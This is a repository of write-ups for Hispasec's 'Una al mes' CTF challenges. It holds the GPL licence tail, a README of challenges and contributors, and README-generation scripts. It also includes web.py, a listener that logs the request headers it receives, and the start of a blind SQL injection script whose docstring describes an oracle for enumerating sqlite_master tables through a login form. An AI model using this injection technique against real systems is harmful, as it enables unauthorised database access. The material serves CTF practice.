550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program.  If not, see https://www.gnu.org/licenses/.
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | https://www.gnu.org/licenses/.
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | https://www.gnu.org/licenses/why-not-lgpl.html.
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # unaalmes-writeups
2 | Write-ups for UAM challenges.
3 |
4 |
5 |
6 | https://unaalmes.hispasec.com
7 |
8 | # Submissions
9 | If you want your own write-up added to this repository, send it by email to: unaalmes@hispasec.com
10 |
11 | # Contact
12 | You can contact the UAM administrators via Telegram or email.
13 | - Telegram: https://t.me/joinchat/AKWAVkxjj1GTE_cvkvQvIQ
14 | - E-mail: unaalmes@hispasec.com
15 | # Challenges
16 | ## universomarvel
17 | | Episode | Writeups |
18 | |---|---|
19 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/bicacaro) [arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/arsenics) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/nachinho3) [oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/oreos) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/rafamartos) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/1v4n) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/julianjm) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/j0n3) [victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/victormanuelleyva) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/darkeagle) [masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/masi) |
20 | | **episodio1-2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/bicacaro) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/nachinho3) [oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/oreos) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/julianjm) [socialkas](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/socialkas) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/darkeagle) [masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/masi) |
21 | | **episodio2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/bicacaro) [arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/arsenics) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/julianjm) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/darkeagle) [asterixco](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/asterixco) |
22 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/bicacaro) [arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/arsenics) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/julianjm) [bechma](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/bechma) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/darkeagle) |
23 | ## siliconvalley
24 | | Episode | Writeups |
25 | |---|---|
26 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/bicacaro) [percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/percu) [arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/arsenics) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/nachinho3) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/rafamartos) [rubenansotegui](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/rubenansotegui) [tonicastillo](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/tonicastillo) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/1v4n) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/darkeagle) [ramonsola](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/ramonsola) |
27 | | **episodio2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/bicacaro) [arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/arsenics) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/nachinho3) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/rafamartos) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/1v4n) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/darkeagle) |
28 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/bicacaro) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/nachinho3) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/rafamartos) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/1v4n) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/darkeagle) |
29 | ## missions
30 | | Episode | Writeups |
31 | |---|---|
32 | | **mission02:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission02/nachinho3) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission02/1v4n) |
33 | | **mission03:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission03/nachinho3) |
34 | | **mission04:** |[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission04/j0n3) |
35 | | **mission05:** |[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/percu) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/nachinho3) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/rafamartos) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/j0n3) |
36 | | **mission06:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/nachinho3) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/rafamartos) [1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/1v4n) |
37 | ## matrix
38 | | Episode | Writeups |
39 | |---|---|
40 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/bicacaro) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/nachinho3) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/julianjm) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/darkeagle) |
41 | | **episodio2:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/nachinho3) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/julianjm) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/darkeagle) |
42 | | **episodio3:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/arsenics) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/darkeagle) |
43 | ## lacasadepapel
44 | | Episode | Writeups |
45 | |---|---|
46 | | **episodio1-1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/bicacaro) [percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/percu) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/nachinho3) [alejandroparras](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/alejandroparras) [oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/oreos) [selankon](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/selankon) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/rafamartos) [socialkas](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/socialkas) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/j0n3) [victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/victormanuelleyva) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/darkeagle) |
47 | | **episodio1-2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/bicacaro) [oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/oreos) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/rafamartos) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/darkeagle) |
48 | | **episodio2:** |[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/percu) [cesarjz](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/cesarjz) [rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/rafamartos) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/j0n3) [victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/victormanuelleyva) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/darkeagle) |
49 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/bicacaro) [blueudp](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/blueudp) [cesarjz](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/cesarjz) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/j0n3) [victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/victormanuelleyva) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/darkeagle) |
50 | ## futurama
51 | | Episode | Writeups |
52 | |---|---|
53 | | **episodio3-1:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/futurama/episodio3-1/arsenics) |
54 | ## extra
55 | | Episode | Writeups |
56 | |---|---|
57 | | **extra:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/arsenics) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/j0n3) [darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/darkeagle) |
58 | ## dragonball
59 | | Episode | Writeups |
60 | |---|---|
61 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/bicacaro) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/nachinho3) [M3n0s_D0n4ld](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/M3n0s_D0n4ld) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/julianjm) [j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/j0n3) |
62 | | **episodio2:** |[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio2/j0n3) |
63 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/bicacaro) [nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/nachinho3) [julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/julianjm) |
64 | ## breakingbad
65 | | Episode | Writeups |
66 | |---|---|
67 | | **episodio 3:** |[rmartinsanta](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio%203/rmartinsanta) |
68 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio1/bicacaro) [masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio1/masi) |
69 | | **episodio2:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio2/arsenics) [masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio2/masi) |
70 | # Contributors
71 | | # | Nickname | Contributions |
72 | |---|---|---:|
73 | | 1 | j0n3 | 15 |
74 | | 2 | darkeagle | 15 |
75 | | 3 | bicacaro | 14 |
76 | | 4 | nachinho3 | 14 |
77 | | 5 | arsenics | 9 |
78 | | 6 | rafamartos | 9 |
79 | | 7 | julianjm | 8 |
80 | | 8 | 1v4n | 6 |
81 | | 9 | oreos | 4 |
82 | | 10 | masi | 4 |
83 | | 11 | victormanuelleyva | 4 |
84 | | 12 | percu | 4 |
85 | | 13 | socialkas | 2 |
86 | | 14 | cesarjz | 2 |
87 | | 15 | asterixco | 1 |
88 | | 16 | bechma | 1 |
89 | | 17 | alejandroparras | 1 |
90 | | 18 | selankon | 1 |
91 | | 19 | blueudp | 1 |
92 | | 20 | rmartinsanta | 1 |
93 | | 21 | M3n0s_D0n4ld | 1 |
94 | | 22 | rubenansotegui | 1 |
95 | | 23 | tonicastillo | 1 |
96 | | 24 | ramonsola | 1 |
97 |
--------------------------------------------------------------------------------
/README_top.md:
--------------------------------------------------------------------------------
1 | # unaalmes-writeups
2 | Write-ups for UAM challenges.
3 |
4 |
5 |
6 | https://unaalmes.hispasec.com
7 |
8 | # Submissions
9 | If you want your own write-up added to this repository, send it by email to: unaalmes@hispasec.com
10 |
11 | # Contact
12 | You can contact the UAM administrators via Telegram or email.
13 | - Telegram: https://t.me/joinchat/AKWAVkxjj1GTE_cvkvQvIQ
14 | - E-mail: unaalmes@hispasec.com
15 |
--------------------------------------------------------------------------------
/contrib.py:
--------------------------------------------------------------------------------
1 | import os
2 | import urllib.parse
3 |
4 |
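def create_contribs(root='writeups'):
    """Collect write-up contributors from the ``root/<challenge>/<episode>/<user>`` tree.

    Args:
        root: directory holding one sub-directory per challenge. Defaults to
            the repository's ``writeups`` directory, resolved relative to the
            current working directory (``generate_readme.sh`` runs this script
            from the repository root).

    Returns:
        A nested dict ``{challenge_entry: {episode_entry: [user, ...]}}``.
        The outer keys are the ``os.DirEntry`` objects of the challenge
        directories, the inner keys the ``os.DirEntry`` objects of the episode
        directories (callers read ``.name`` on both), and each leaf is the
        alphabetically sorted list of user directory names.

    Only real directories count at every level: a stray file such as
    ``.gitkeep`` or a README inside the tree is skipped instead of making the
    nested ``os.scandir`` raise ``NotADirectoryError``, and symlinks are not
    followed so the walk cannot be redirected outside the write-ups tree by a
    link placed in it. The scandir iterators are closed via ``with`` so no
    directory handles leak.
    """
    contributions = dict()
    with os.scandir(root) as challenges:
        for challenge in challenges:
            if not challenge.is_dir(follow_symlinks=False):
                continue
            contributions[challenge] = dict()
            with os.scandir(challenge.path) as episodes:
                for episode in episodes:
                    if not episode.is_dir(follow_symlinks=False):
                        continue
                    with os.scandir(episode.path) as users:
                        names = [entry.name for entry in users
                                 if entry.is_dir(follow_symlinks=False)]
                    # Sorted so that regenerating README.md yields the same
                    # output regardless of the filesystem's enumeration order.
                    contributions[challenge][episode] = sorted(names)
    return contributions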
16 |
17 |
def contrib_rankings(contribs):
    """Count how many write-ups each user has contributed.

    Args:
        contribs: the nested ``{challenge: {episode: [user, ...]}}`` mapping
            produced by ``create_contribs``.

    Returns:
        ``{user: count}`` where count is the number of (challenge, episode)
        pairs that list the user. Keys appear in first-seen order.
    """
    ranking = dict()
    every_user = (user
                  for episodes in contribs.values()
                  for users in episodes.values()
                  for user in users)
    for user in every_user:
        ranking[user] = ranking.get(user, 0) + 1
    return ranking
28 |
29 |
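def md_template_ranking(ranking):
    """Print the "Contributors" Markdown table to stdout.

    Args:
        ranking: ``{user: count}`` as returned by ``contrib_rankings``.

    Rows are ordered by descending contribution count; users with the same
    count are ordered by name. The original tie order depended on dict
    insertion order, i.e. on the order the filesystem enumerated directories,
    which made the committed README.md churn between machines.
    """
    print("# Contributors")
    print("| # | Nickname | Contributions |")
    print("|---|---|---:|")
    ordered = sorted(ranking.items(), key=lambda item: (-item[1], item[0]))
    for position, (user, count) in enumerate(ordered, start=1):
        print("| {} | {} | {} |".format(position, user, count))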
40 |
41 |
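def md_template_contribs(contribs):
    """Print the "Challenges" Markdown tables (one per challenge) to stdout.

    Args:
        contribs: the nested ``{challenge: {episode: [user, ...]}}`` mapping
            produced by ``create_contribs``. Challenge and episode keys may be
            ``os.DirEntry`` objects (their ``.name`` is used) or plain strings.

    Each episode row links every user's write-up directory on GitHub. Every
    path component is percent-encoded with ``urllib.parse.quote`` because
    directory names may contain spaces (``episodio 3``) or other characters
    that are not valid in a URL. Challenges are listed in reverse alphabetical
    order, episodes and users alphabetically, so the output does not depend on
    filesystem enumeration order.

    NOTE: the link text is the raw directory name. A name containing ``]``,
    ``)`` or ``|`` would break the link or table markup; this relies on the
    maintainers controlling what lands in ``writeups/``, it is not escaped.
    """
    writeups_dir = "writeups"
    github_url_format = "https://github.com/sysdevploit/unaalmes-writeups/tree/master/{}/{}"

    def entry_name(entry):
        # Accept both os.DirEntry keys (from create_contribs) and bare strings.
        return getattr(entry, "name", entry)

    print("# Challenges")
    for challenge in sorted(contribs, key=entry_name, reverse=True):
        print("## {}".format(entry_name(challenge)))
        print("| Episode | Writeups |")
        print("|---|---|")
        episodes = contribs[challenge]
        for episode in sorted(episodes, key=entry_name):
            links = []
            for user in sorted(episodes[episode]):
                path = "/".join(urllib.parse.quote(part) for part in
                                (entry_name(challenge), entry_name(episode), user))
                links.append("[{}]({}) ".format(
                    user, github_url_format.format(writeups_dir, path)))
            # Row layout is kept byte-identical to the previously generated
            # README.md: "| **episode:** |[user](url) [user](url) |".
            print("| **{}:** |{}|".format(entry_name(episode), "".join(links)))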
62 |
63 |
def _main():
    """Emit the generated README body: challenge tables first, then the ranking."""
    contributors = create_contribs()
    ranking = contrib_rankings(contributors)

    md_template_contribs(contributors)
    md_template_ranking(ranking)


if __name__ == '__main__':
    _main()
70 |
--------------------------------------------------------------------------------
/generate_readme.sh:
--------------------------------------------------------------------------------
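#!/usr/bin/env bash
# Rebuild README.md: the static header from README_top.md followed by the
# challenge/contributor tables printed by contrib.py.
#
# Run from the repository root: contrib.py scans the relative 'writeups/' dir.
# The output is assembled in a temp file and moved into place at the end so a
# failing contrib.py run cannot leave a half-written README.md behind.
set -euo pipefail

tmp="$(mktemp)"
trap 'rm -f "$tmp"' EXIT

cat 'README_top.md' > "$tmp"
python3 contrib.py >> "$tmp"
mv "$tmp" README.md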
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio 3/rmartinsanta/rmartinsanta.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio 3/rmartinsanta/rmartinsanta.pdf
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/bicacaro/BREAKING_BAD_EP1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio1/bicacaro/BREAKING_BAD_EP1.pdf
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/bicacaro/web.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | #
4 | import struct
5 | from operator import *
6 | from http.server import HTTPServer, BaseHTTPRequestHandler
7 |
8 |
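class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    """Minimal listener: prints each GET's request headers and answers " OK ".

    Python 3 only (``http.server``).  Useful as a catch-all endpoint when you
    want to see exactly which headers a client sends.
    """

    def do_GET(self):
        """Dump the incoming headers to stdout and reply 200 with a tiny body."""
        print (self.headers)
        # NOTE: set on the instance after parsing, so this only changes the
        # status line ("HTTP/1.1 200 OK"); the connection still closes after
        # the response as for the class default.
        self.protocol_version='HTTP/1.1'
        # bytes(" OK ") raised TypeError on Python 3 (str needs an encoding),
        # so the handler never produced a body; use a bytes literal.
        body = b" OK "
        self.send_response(200, 'OK')
        self.send_header('Content-type', 'text/html')
        # Tell the client where the body ends instead of relying on close.
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)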
18 |
# Listen on every interface on port 64010 and serve until interrupted.
_server = HTTPServer(('', 64010), SimpleHTTPRequestHandler)
_server.serve_forever()
21 |
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/masi/login_brute_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from hashlib import sha512
3 | from flask.sessions import session_json_serializer
4 | from itsdangerous import URLSafeTimedSerializer, BadTimeSignature
5 | import base64
6 | import zlib
7 | from cuteprint.cuteprint import PrettyPrinter
8 | import sys
9 | import requests
10 | import urllib3
11 | import string
12 | import urllib
13 | import time
14 | #from tqdm import tqdm
# Every request below is sent with verify=False; silence urllib3's
# InsecureRequestWarning so the console output stays readable.
urllib3.disable_warnings()

# Shared console printer (cuteprint is a third-party helper, not stdlib).
p = PrettyPrinter()
def getMaxTables():
    """Count the application's tables through a boolean-based blind SQL injection.

    Each request asks the login form one yes/no question (``count(tbl_name) = i``
    over ``sqlite_master``) and reads the answer from two side channels: a 302
    redirect plus a fixed first segment of the ``session`` cookie (apparently
    the flash message the app sets when the injected condition selects a row).
    That redirect/cookie pair is the oracle; a handler that used parameterised
    queries and returned an identical response for every failed login would
    not expose it.

    Prints the count when it is found.  Returns ``None`` (``getMaxUsers`` is
    the sibling that returns its result); the ``i += 1`` before ``break`` has
    no effect here.
    """
